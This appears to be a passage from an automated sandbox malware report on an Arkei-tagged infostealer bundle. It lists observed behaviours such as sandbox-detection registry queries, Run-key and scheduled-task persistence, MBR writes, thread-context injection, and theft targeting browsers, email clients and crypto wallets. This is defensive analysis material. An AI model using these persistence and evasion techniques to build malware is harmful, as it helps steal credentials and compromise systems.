arkei | 5e2bf564a4f985a7482d505def1ec79c92566bf7eda4724811ee29b9c4a66156

System Information Discovery

Processes:

i7fLMpX7oGXSbEkFfE5R182r.exeInstall.exe72A1.exeFri10d184202996a0d7f.exe9F4Xktpzp1wzfwZd5KZ8KO98.exe5Ht4JL0tbOHEn4OZeeUiT1uC.exef7GKXS2oAwqMu_TMdPaBiB6K.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	i7fLMpX7oGXSbEkFfE5R182r.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	72A1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Fri10d184202996a0d7f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	9F4Xktpzp1wzfwZd5KZ8KO98.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5Ht4JL0tbOHEn4OZeeUiT1uC.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	f7GKXS2oAwqMu_TMdPaBiB6K.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	i7fLMpX7oGXSbEkFfE5R182r.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	72A1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Fri10d184202996a0d7f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	9F4Xktpzp1wzfwZd5KZ8KO98.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5Ht4JL0tbOHEn4OZeeUiT1uC.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	f7GKXS2oAwqMu_TMdPaBiB6K.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

Fri10584c049c7f.exeiAeXXqhQNJKur7teIlOrvF32.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Control Panel\International\Geo\Nation	Fri10584c049c7f.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Control Panel\International\Geo\Nation	iAeXXqhQNJKur7teIlOrvF32.exe

Loads dropped DLL 64 IoCs

Processes:

setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.exeFri1015b9a4e0b.exeFri106e757f6d75.execmd.exeFri1008c7d6874.execmd.execmd.exeFri10584c049c7f.exeFri1034cd265b5e0adcd.execmd.execmd.execmd.exeFri10fcc13ae0125c8.execmd.exeFri10d184202996a0d7f.exeFri10720d229511df563.exeFri10fcc13ae0125c8.tmpcmd.exeSkVPVS3t6Y8W.EXei7fLMpX7oGXSbEkFfE5R182r.exeFri10acd1e0a9e6.exeFri106e757f6d75.exeWerFault.exe

pid	process
1124	setup_x86_x64_install.exe
1116	setup_installer.exe
1116	setup_installer.exe
1116	setup_installer.exe
1116	setup_installer.exe
1116	setup_installer.exe
1116	setup_installer.exe
1924	setup_install.exe
1924	setup_install.exe
1924	setup_install.exe
1924	setup_install.exe
1924	setup_install.exe
1924	setup_install.exe
1924	setup_install.exe
1924	setup_install.exe
1436	cmd.exe
608	cmd.exe
608	cmd.exe
1080	cmd.exe
1260	cmd.exe
1260	cmd.exe
1444	Fri1015b9a4e0b.exe
1444	Fri1015b9a4e0b.exe
1020	Fri106e757f6d75.exe
1020	Fri106e757f6d75.exe
920	cmd.exe
1368	Fri1008c7d6874.exe
1368	Fri1008c7d6874.exe
1344	cmd.exe
1992	cmd.exe
1700	Fri10584c049c7f.exe
1700	Fri10584c049c7f.exe
1956	Fri1034cd265b5e0adcd.exe
1956	Fri1034cd265b5e0adcd.exe
1656	cmd.exe
1688	cmd.exe
768	cmd.exe
768	cmd.exe
1932	Fri10fcc13ae0125c8.exe
1932	Fri10fcc13ae0125c8.exe
1632	cmd.exe
1040	Fri10d184202996a0d7f.exe
1040	Fri10d184202996a0d7f.exe
1932	Fri10fcc13ae0125c8.exe
1248	Fri10720d229511df563.exe
1248	Fri10720d229511df563.exe
1672	Fri10fcc13ae0125c8.tmp
1672	Fri10fcc13ae0125c8.tmp
1672	Fri10fcc13ae0125c8.tmp
2080	cmd.exe
1672	Fri10fcc13ae0125c8.tmp
2144	SkVPVS3t6Y8W.EXe
2144	SkVPVS3t6Y8W.EXe
1020	i7fLMpX7oGXSbEkFfE5R182r.exe
564	Fri10acd1e0a9e6.exe
564	Fri10acd1e0a9e6.exe
2248	Fri106e757f6d75.exe
2248	Fri106e757f6d75.exe
1700	Fri10584c049c7f.exe
2652	WerFault.exe
2652	WerFault.exe
2652	WerFault.exe
2652	WerFault.exe
2652	WerFault.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

2908 icacls.exe
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
2908	icacls.exe

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\Fri10d184202996a0d7f.exe	themida
\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\Fri10d184202996a0d7f.exe	themida
behavioral3/memory/1040-194-0x0000000000E20000-0x0000000000E21000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

Processes:

Sayma.exe9DC4.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Common Files\\Ceshupyleba.exe\""	Sayma.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\b0eea5d3-26b2-4d14-8f03-49965ac14e0b\\9DC4.exe\" --AutoStart"	9DC4.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 6 IoCs

evasion trojan

System Information Discovery

Processes:

f7GKXS2oAwqMu_TMdPaBiB6K.exei7fLMpX7oGXSbEkFfE5R182r.exe72A1.exeFri10d184202996a0d7f.exe9F4Xktpzp1wzfwZd5KZ8KO98.exe5Ht4JL0tbOHEn4OZeeUiT1uC.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	f7GKXS2oAwqMu_TMdPaBiB6K.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	i7fLMpX7oGXSbEkFfE5R182r.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	72A1.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Fri10d184202996a0d7f.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	9F4Xktpzp1wzfwZd5KZ8KO98.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	5Ht4JL0tbOHEn4OZeeUiT1uC.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

msiexec.exeinstaller.exe

description	ioc	process
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\E:	installer.exe
File opened (read-only)	\??\I:	installer.exe
File opened (read-only)	\??\N:	installer.exe
File opened (read-only)	\??\T:	installer.exe
File opened (read-only)	\??\X:	installer.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\M:	installer.exe
File opened (read-only)	\??\R:	installer.exe
File opened (read-only)	\??\U:	installer.exe
File opened (read-only)	\??\V:	installer.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\O:	installer.exe
File opened (read-only)	\??\P:	installer.exe
File opened (read-only)	\??\S:	installer.exe
File opened (read-only)	\??\Y:	installer.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\B:	installer.exe
File opened (read-only)	\??\F:	installer.exe
File opened (read-only)	\??\J:	installer.exe
File opened (read-only)	\??\K:	installer.exe
File opened (read-only)	\??\L:	installer.exe
File opened (read-only)	\??\Q:	installer.exe
File opened (read-only)	\??\Z:	installer.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\A:	installer.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\W:	installer.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\G:	installer.exe
File opened (read-only)	\??\H:	installer.exe
File opened (read-only)	\??\M:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

38 ipinfo.io
556 api.2ip.ua
327 ipinfo.io
473 api.2ip.ua
486 api.2ip.ua
39 ipinfo.io
146 ip-api.com
303 ipinfo.io
304 ipinfo.io
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
bootkit persistence

Bootkit
T1067

Processes:

2879.exe

description ioc process

File opened for modification \??\PHYSICALDRIVE0 2879.exe

flow	ioc
38	ipinfo.io
556	api.2ip.ua
327	ipinfo.io
473	api.2ip.ua
486	api.2ip.ua
39	ipinfo.io
146	ip-api.com
303	ipinfo.io
304	ipinfo.io

description	ioc	process
File opened for modification	\??\PHYSICALDRIVE0	2879.exe

Drops file in System32 directory 5 IoCs

Processes:

Install.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

Processes:

Fri10d184202996a0d7f.exe5Ht4JL0tbOHEn4OZeeUiT1uC.exef7GKXS2oAwqMu_TMdPaBiB6K.exei7fLMpX7oGXSbEkFfE5R182r.exe72A1.exe

pid process

1040 Fri10d184202996a0d7f.exe
2672 5Ht4JL0tbOHEn4OZeeUiT1uC.exe
2544 f7GKXS2oAwqMu_TMdPaBiB6K.exe
1020 i7fLMpX7oGXSbEkFfE5R182r.exe
3432 72A1.exe

Suspicious use of SetThreadContext 11 IoCs

Processes:

i7fLMpX7oGXSbEkFfE5R182r.exe9F4Xktpzp1wzfwZd5KZ8KO98.exe9DC4.exe9DC4.exebuild2.exebuild3.exemstsca.exemstsca.exemstsca.exemstsca.exe9DC4.exe

description	pid	process	target process
PID 1020 set thread context of 2248	1020	i7fLMpX7oGXSbEkFfE5R182r.exe	Fri106e757f6d75.exe
PID 2488 set thread context of 3812	2488	9F4Xktpzp1wzfwZd5KZ8KO98.exe	RegSvcs.exe
PID 3356 set thread context of 1620	3356	9DC4.exe	9DC4.exe
PID 3868 set thread context of 2768	3868	9DC4.exe	9DC4.exe
PID 3660 set thread context of 768	3660	build2.exe	build2.exe
PID 1724 set thread context of 3952	1724	build3.exe	build3.exe
PID 468 set thread context of 4136	468	mstsca.exe	mstsca.exe
PID 4644 set thread context of 4772	4644	mstsca.exe	mstsca.exe
PID 4012 set thread context of 3496	4012	mstsca.exe	mstsca.exe
PID 4632 set thread context of 4860	4632	mstsca.exe	mstsca.exe
PID 1984 set thread context of 1968	1984	9DC4.exe	9DC4.exe

Drops file in Program Files directory 22 IoCs

Processes:

JVeNuMZxbjp5KpNoHrbLFJl8.exeSayma.exeultramediaburner.tmpQjyc7EC86PyVdSLUUAM2kzDS.exemsiexec.exe

description	ioc	process
File created	C:\Program Files (x86)\Company\NewProduct\Uninstall.ini	JVeNuMZxbjp5KpNoHrbLFJl8.exe
File created	C:\Program Files\Internet Explorer\YINOSNAJGX\ultramediaburner.exe	Sayma.exe
File created	C:\Program Files (x86)\Common Files\Ceshupyleba.exe.config	Sayma.exe
File created	C:\Program Files (x86)\UltraMediaBurner\is-T8FBK.tmp	ultramediaburner.tmp
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	Qjyc7EC86PyVdSLUUAM2kzDS.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\inst002.exe	JVeNuMZxbjp5KpNoHrbLFJl8.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe	JVeNuMZxbjp5KpNoHrbLFJl8.exe
File created	C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe	msiexec.exe
File created	C:\Program Files (x86)\AW Manager\Windows Manager\Uninstall.lnk	msiexec.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url	msiexec.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\Uninstall.exe	JVeNuMZxbjp5KpNoHrbLFJl8.exe
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe	ultramediaburner.tmp
File created	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\UltraMediaBurner\is-B05Q1.tmp	ultramediaburner.tmp
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	Qjyc7EC86PyVdSLUUAM2kzDS.exe
File created	C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe	msiexec.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.ini	msiexec.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\cm3.exe	JVeNuMZxbjp5KpNoHrbLFJl8.exe
File created	C:\Program Files (x86)\Common Files\Ceshupyleba.exe	Sayma.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\Privacy.url	msiexec.exe
File created	C:\Program Files\Internet Explorer\YINOSNAJGX\ultramediaburner.exe.config	Sayma.exe

Drops file in Windows directory 34 IoCs

Processes:

msiexec.exeD666.exesvchost.exe

description	ioc	process
File opened for modification	C:\Windows\Installer\MSI646C.tmp	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File created	C:\Windows\System\svchost.exe	D666.exe
File opened for modification	C:\Windows\Installer\cbe12.ipi	msiexec.exe
File created	C:\Windows\System\xxx1.bak	D666.exe
File opened for modification	C:\Windows\Installer\MSI147C.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIFC41.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7BC4.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File opened for modification	C:\Windows\System\svchost.exe	D666.exe
File opened for modification	C:\Windows\Installer\MSI205F.tmp	msiexec.exe
File created	C:\Windows\Installer\cbe12.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5FD8.tmp	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID494.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\cbe10.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI3A29.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5FD7.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIAF08.tmp	msiexec.exe
File created	C:\Windows\Installer\cbe14.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI2CCF.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5210.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5BFF.tmp	msiexec.exe
File created	C:\Windows\System\xxx1.bak	svchost.exe
File opened for modification	C:\Windows\Installer\MSID8D3.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI3893.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI92B0.tmp	msiexec.exe
File created	C:\Windows\Installer\cbe10.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC58.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8289.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIA9D9.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIBB67.tmp	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 7 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2652	1248	WerFault.exe	Fri10720d229511df563.exe
2884	2304	WerFault.exe	8Y2btnvkYZZYOVAmRmBwuiFZ.exe
2284	1700	WerFault.exe	Fri10584c049c7f.exe
2440	2228	WerFault.exe	D3Lx0aVCMLQsC133qZwP_h9Y.exe
1688	2756	WerFault.exe	B7rEf01TJHCnPi41f3gaGm1S.exe
2256	1568	WerFault.exe	iAeXXqhQNJKur7teIlOrvF32.exe
4388	768	WerFault.exe	build2.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

fscgbhcFri105268dda3.exe

description	ioc	process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	fscgbhc
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Fri105268dda3.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Fri105268dda3.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Fri105268dda3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	fscgbhc
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	fscgbhc

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

FZJ0uQGJzK34b6TeW89tx0YO.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	FZJ0uQGJzK34b6TeW89tx0YO.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	FZJ0uQGJzK34b6TeW89tx0YO.exe

Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

3488 schtasks.exe
2036 schtasks.exe
468 schtasks.exe
4236 schtasks.exe
4372 schtasks.exe
3820 schtasks.exe
3404 schtasks.exe
Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

3040 timeout.exe
3088 timeout.exe

pid	process
3488	schtasks.exe
2036	schtasks.exe
468	schtasks.exe
4236	schtasks.exe
4372	schtasks.exe
3820	schtasks.exe
3404	schtasks.exe

pid	process
3040	timeout.exe
3088	timeout.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

Processes:

Install.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Kills process with taskkill 4 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

4512 taskkill.exe
2160 taskkill.exe
3040 taskkill.exe
3288 taskkill.exe

pid	process
4512	taskkill.exe
2160	taskkill.exe
3040	taskkill.exe
3288	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 44 IoCs

adware spyware

Modify Registry

Processes:

iexplore.exeIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c0df62db3eb9d701	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff6f00000019000000f50400007e020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "340130640"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000005f45a3407a6eee4cb6062dddd85478a600000000020000000000106600000001000020000000252597d2bddd7472ba57022a3a8b8a6513042397636eeb90a6a1b4668ec5168a000000000e80000000020000200000009e2512b91e365dea24f66f7c455e02276fb4414f9f62926ba8d25b04831b7c0020000000cf5e40f4e12aaa265166e4bc48d895431c87150c679d6c90b6d7c87032604a97400000003e83c001d00d1d0fa2ccb76365edf3e0b1db990c4cdaeb12c14a51268d068b70dc16f669225cda94381e849486861c09f94442d8f1316a7e559b3e834d4bc097	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000005f45a3407a6eee4cb6062dddd85478a6000000000200000000001066000000010000200000002ef81735b94c16b745ab30db9525805c6b4b9d7100c4ee35bfb822e402f272b3000000000e8000000002000020000000ffaf9c2160fd0f370166b98bd4aa218c95e8f20928b628b2ac26a38b4dbe9fee9000000073358f852ba3fe460d8d674393cbfb863bf3f348ca19e9347674ea90ab076cbe2fd40388516683537fcf2c328c0fa5e3eabf496570bf34c3c7873f51270529ac9edc7cfc056f220d5d40fd8a5881772c0dd01e6116453dff8fdbb02eba5ee979b7150bb8f1cabe1c428353bec423c981d647e02d3e0f91fa301344226f824c9c1dd448198a856d64af3228d3fd5b698c4000000025df05a33c7daa19419149fb425427bf4ae6ae2a02d615fac9db616aadcb361e3c0536670a3bf0de2e67b916e00dceb5fd8115398560b112a36eac7e24303c55	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\de-DE = "de-DE.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{CBC5DD11-2531-11EC-8175-C2E46088F6E7} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
